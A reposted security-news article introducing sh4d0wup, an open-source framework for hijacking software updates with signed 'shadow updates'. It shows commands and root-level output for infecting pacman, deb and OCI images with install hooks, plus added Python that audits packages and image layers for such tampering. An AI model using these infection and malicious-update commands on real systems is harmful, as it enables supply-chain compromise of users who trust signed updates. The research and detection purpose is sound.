sh4d0wup: a powerful signing-key and update exploitation framework

admin, 2023-06-01 08:52:46

About sh4d0wup

Have you ever wondered whether the update you download is the same one everyone else receives, or whether you are being served a different update built just for you? sh4d0wup is a powerful signing-key and update exploitation framework; its name refers to the "shadow update".

A shadow update is an update that does not officially exist but carries a valid signature, so clients accept it as genuine. This can happen when the signing key has been leaked to an attacker, or when a release engineer with legitimate access decides to act maliciously.

At its core, sh4d0wup is an HTTP/HTTPS update server that sits in front of the legitimate server as a reverse proxy and can infect and sign a wide range of tool, file and code formats. Researchers can use it to study and test whether the update mechanisms of their own systems are secure and robust.

Download

Clone the project source to your machine with the following command:

git clone https://github.com/kpcyrd/sh4d0wup.git


Building a Plot

Some Plots are quite involved to run. To avoid long setup times, a Plot can be built ahead of time, with its signatures created in advance:

sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst

Running a Plot

The following command starts a malicious HTTP update server from the Plot configuration; it also accepts a plain YAML file as input:

sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst


Sample YAML files:

contrib/plot-archlinux.yaml: https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-archlinux.yaml

contrib/plot-debian.yaml: https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-debian.yaml

contrib/plot-rustup.yaml: https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-rustup.yaml

contrib/plot-curl-sh.yaml: https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-curl-sh.yaml

Infecting a file

sh4d0wup infect elf

% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO  sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO  sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO  sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO  sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
Usage: a.out [OPTIONS] <COMMAND>
Commands:
  bait         Start a malicious update server
  infect       High-level tampering: inject additional commands into a package
  tamper       Low-level tampering: patch a package database to add malicious packages, trigger updates or influence dependency resolution
  keygen       Generate signing keys with the given parameters
  sign         Generate signatures with a signing key
  hsm          Interact with hardware signing keys
  build        Compile an attack based on a Plot
  check        Check whether a Plot can still execute
  completions  Generate shell completion scripts
  help         Print this help message
Options:
  -v, --verbose...  Enable debug output
  -h, --help        Print this help message


sh4d0wup infect pacman

% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO  sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...
Packages (1) sh4d0wup-0.2.0-2
Total Installed Size:  13.36 MiB
Net Upgrade Size:       0.00 MiB
:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring                                         [#######################################] 100%
(1/1) checking package integrity                                       [#######################################] 100%
(1/1) loading package files                                            [#######################################] 100%
(1/1) checking for file conflicts                                      [#######################################] 100%
(1/1) checking available disk space                                    [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup                                               [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk


sh4d0wup infect deb

% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
[2022-12-09T16:28:02Z INFO  sh4d0wup::infect::deb] Patching "control.tar.xz"
% sudo apt install ./apt_2.2.4-1_amd64.deb
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
Suggested packages:
  apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
Recommended packages:
  ca-certificates
The following packages will be upgraded:
  apt
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B/1491 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: delaying package configuration, since apt-utils is not installed
(Reading database ... 6661 files and directories currently installed.)
Preparing to unpack /apt_2.2.4-1_amd64.deb ...
Unpacking apt (2.2.4-1) over (2.2.4) ...
Setting up apt (2.2.4-1) ...
uid=0(root) gid=0(root) groups=0(root)
Processing triggers for libc-bin (2.31-13+deb11u5) ...
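Both the pacman and the deb sessions above work the same way: an otherwise genuine package gains an install hook (a maintainer script) and a bumped version, and the package manager runs the hook as root. As an added defender-side example, not part of the original post or of sh4d0wup itself, the Python below opens a .deb (an `ar` archive holding a control tarball) without installing it, lists the maintainer scripts inside the control archive, and compares the package's Version field with the version the signed repository index advertises. The sample package, the `build_deb` helper that constructs it (using a gzip control archive, which dpkg also accepts), and the expected version string are all constructed for this example.

```python
import io
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")


def _ar_member(name, data):
    """Serialize one member of a classic ar archive (60-byte header, even padding)."""
    header = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
    assert len(header) == 60
    return header + data + (b"\n" if len(data) % 2 else b"")


def build_deb(control_fields, scripts):
    """Constructed sample .deb: debian-binary + control.tar.gz + empty data.tar.gz."""
    control_text = "".join(f"{k}: {v}\n" for k, v in control_fields.items())
    control_buf = io.BytesIO()
    with tarfile.open(fileobj=control_buf, mode="w:gz") as tar:
        def add(name, text, mode):
            data = text.encode()
            info = tarfile.TarInfo("./" + name)
            info.size, info.mode = len(data), mode
            tar.addfile(info, io.BytesIO(data))
        add("control", control_text, 0o644)
        for name, body in scripts.items():
            add(name, body, 0o755)  # maintainer scripts are executable
    data_buf = io.BytesIO()
    with tarfile.open(fileobj=data_buf, mode="w:gz"):
        pass  # no payload files are needed for the control-archive audit
    return (b"!<arch>\n"
            + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", control_buf.getvalue())
            + _ar_member("data.tar.gz", data_buf.getvalue()))


def ar_members(blob):
    """Parse an ar archive into {member name: bytes} without touching the disk."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    members, pos = {}, 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        name = hdr[0:16].decode().strip().rstrip("/")  # GNU ar appends '/' to names
        size = int(hdr[48:58].decode().strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)  # members are padded to an even offset
    return members


def control_entries(deb):
    """Return every regular file in the control archive (control.tar.*) as {name: text}."""
    members = ar_members(deb)
    control_name = next(n for n in members if n.startswith("control.tar"))
    entries = {}
    with tarfile.open(fileobj=io.BytesIO(members[control_name]), mode="r:*") as tar:
        for m in tar.getmembers():
            if m.isfile():
                entries[m.name.lstrip("./")] = tar.extractfile(m).read().decode()
    return entries


def audit_deb(deb, expected_version, allow_scripts=()):
    """Findings worth a look before 'apt install ./pkg.deb' hands the package to dpkg."""
    entries = control_entries(deb)
    fields = dict(line.split(": ", 1) for line in entries["control"].splitlines() if ": " in line)
    findings = []
    if fields.get("Version") != expected_version:
        findings.append(f"Version {fields.get('Version')!r} differs from index value {expected_version!r}")
    for script in MAINTAINER_SCRIPTS:
        if script in entries and script not in allow_scripts:
            findings.append(f"unexpected maintainer script {script}: {entries[script].strip()[:40]!r}")
    return findings


if __name__ == "__main__":
    fields = {"Package": "apt", "Version": "2.2.4-1", "Architecture": "amd64"}  # constructed
    sample = build_deb(fields, {"postinst": "#!/bin/sh\necho hook-ran\n"})    # constructed hook
    for finding in audit_deb(sample, expected_version="2.2.4"):
        print("!", finding)
```

To audit a real package, pass `open(path, "rb").read()` to `audit_deb` with the version taken from the signed `Packages` index rather than from the file name. Many legitimate packages ship maintainer scripts, so the `allow_scripts` baseline should come from the previous known-good release of the same package; a release that suddenly gains a postinst its predecessor did not have, or whose version is not in the repository index at all, is exactly the shape of the shadow update the post describes.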


sh4d0wup infect oci

% docker pull alpine:edge
% docker save alpine:edge > alpine-edge.tar
% sh4d0wup infect oci alpine-edge.tar infected.tar -c id -t infected:latest
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Original image is referencing config "121d0da757518198deeb7d1df20aaae549834f8bc77195bbf5be1900c0144cff.json": LayerConfig { config: Some(Config { user: Some(""), exposed_ports: None, env: Some(["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"]), entrypoint: None, cmd: Some(["/bin/sh"]), volumes: None, working_dir: Some(""), labels: None, stop_signal: None }), rootfs: Some(RootFs { type: "layers", diff_ids: ["sha256:2f7048230bc73ff091490aa5764f9c160d1a4efe04935da731a22e8d5fcccfcc"] }), extra: {"container_config": Object {"AttachStderr": Bool(false), "AttachStdin": Bool(false), "AttachStdout": Bool(false), "Cmd": Array [String("/bin/sh"), String("-c"), String("#(nop) "), String("CMD ["/bin/sh"]")], "Domainname": String(""), "Entrypoint": Null, "Env": Array [String("PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin")], "Hostname": String("457781b778a4"), "Image": String("sha256:28d4c3ce9341a318d475e64365e47a34d5b9ba6c670bed35ce90b2402296ead6"), "Labels": Object {}, "OnBuild": Null, "OpenStdin": Bool(false), "StdinOnce": Bool(false), "Tty": Bool(false), "User": String(""), "Volumes": Null, "WorkingDir": String("")}, "architecture": String("amd64"), "created": String("2022-11-10T20:19:29.043621251Z"), "history": Array [Object {"created": String("2022-11-10T20:19:28.834390785Z"), "created_by": String("/bin/sh -c #(nop) ADD file:51c4407dc777648e8ebc8e124b05feb1807699ade513b6006a9a409f6b0f6f51 in / ")}, Object {"created": String("2022-11-10T20:19:29.043621251Z"), "created_by": String("/bin/sh -c #(nop)  CMD ["/bin/sh"]"), "empty_layer": Bool(true)}], "os": String("linux"), "docker_version": String("20.10.12"), "container": String("457781b778a449c9eac455ca1a18300a4041cb2b0d2d3f979460d19d7632ebf7")} }
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Creating new layer in image: "patched"
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Generating filesystem layer for payload: "id"
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Updating tags of image to ["infected:latest"]
[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Writing modified manifest...
% docker load -i infected.tar
Loaded image: infected:latest
% docker run -it infected echo hello world
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
hello world
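The oci session above appends a new filesystem layer ("patched") to an image and re-tags it; the image config JSON (the `rootfs.diff_ids` list visible in the log) is where that extra layer shows up. The following Python, added here as a defender-side example and not part of the post or of sh4d0wup, reads a `docker save` tarball, recomputes the digest of every layer listed in manifest.json, checks those digests against the config's declared diff_ids, and flags any layer that is not in a pinned known-good baseline. The `build_saved_image` helper and the two sample layers are constructed for this example and simplify the real docker-save layout (layer directories are named after their digest here).

```python
import hashlib
import io
import json
import tarfile


def _layer_tar(path, text):
    """Constructed uncompressed layer tarball holding a single file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        data = text.encode()
        info = tarfile.TarInfo(path)
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_saved_image(tag, layers):
    """Constructed 'docker save' tarball: manifest.json, <config>.json, <digest>/layer.tar."""
    diff_ids = ["sha256:" + hashlib.sha256(layer).hexdigest() for layer in layers]
    config = {"architecture": "amd64", "os": "linux",
              "config": {"Cmd": ["/bin/sh"]},
              "rootfs": {"type": "layers", "diff_ids": diff_ids}}
    config_bytes = json.dumps(config).encode()
    config_name = hashlib.sha256(config_bytes).hexdigest() + ".json"
    layer_paths = [d.split(":", 1)[1] + "/layer.tar" for d in diff_ids]
    manifest = [{"Config": config_name, "RepoTags": [tag], "Layers": layer_paths}]
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add(name, data):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        add(config_name, config_bytes)
        for path, layer in zip(layer_paths, layers):
            add(path, layer)
        add("manifest.json", json.dumps(manifest).encode())
    return buf.getvalue()


def inspect_saved_image(blob):
    """Read manifest and config, then recompute each layer's diff_id (sha256 of the uncompressed tar)."""
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tar:
        def read(name):
            return tar.extractfile(name).read()
        manifest = json.loads(read("manifest.json"))
        if len(manifest) != 1:
            raise ValueError("expected exactly one image in the tarball")
        entry = manifest[0]
        config = json.loads(read(entry["Config"]))
        declared = config["rootfs"]["diff_ids"]
        actual = ["sha256:" + hashlib.sha256(read(p)).hexdigest() for p in entry["Layers"]]
    return {"tags": entry.get("RepoTags") or [], "declared": declared, "actual": actual}


def audit_image(blob, pinned_diff_ids):
    """Findings that the saved image deviates from a pinned, known-good layer list."""
    info = inspect_saved_image(blob)
    findings = []
    if info["declared"] != info["actual"]:
        findings.append("config diff_ids do not match the layer contents")
    for diff_id in info["actual"]:
        if diff_id not in pinned_diff_ids:
            findings.append(f"layer {diff_id[:19]}... is not in the pinned baseline")
    if len(info["actual"]) != len(pinned_diff_ids):
        findings.append(f"{len(info['actual'])} layers present, {len(pinned_diff_ids)} pinned")
    return findings


if __name__ == "__main__":
    base = _layer_tar("etc/os-release", "NAME=Alpine Linux\n")          # constructed
    extra = _layer_tar("usr/local/bin/hook", "#!/bin/sh\necho hook\n")  # constructed extra layer
    pinned = inspect_saved_image(build_saved_image("alpine:edge", [base]))["actual"]
    for finding in audit_image(build_saved_image("infected:latest", [base, extra]), pinned):
        print("!", finding)
```

The pinned list is the `diff_ids` of the image as it was first reviewed; anything that passes `docker load` later is compared against it before it is run. A tag is not part of that comparison on purpose: the session above shows that re-tagging is free, while an added layer always changes the digest list.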


License

This project is developed and released under the GPL-3.0 open source license.

Project address

sh4d0wup: https://github.com/kpcyrd/sh4d0wup


Originally published on the WeChat public account FreeBuf: sh4d0wup: a powerful signing-key and update exploitation framework

When reprinting, please keep the link to this article (CN-SEC; thanks to the original author): https://cn-sec.com/archives/1779612.html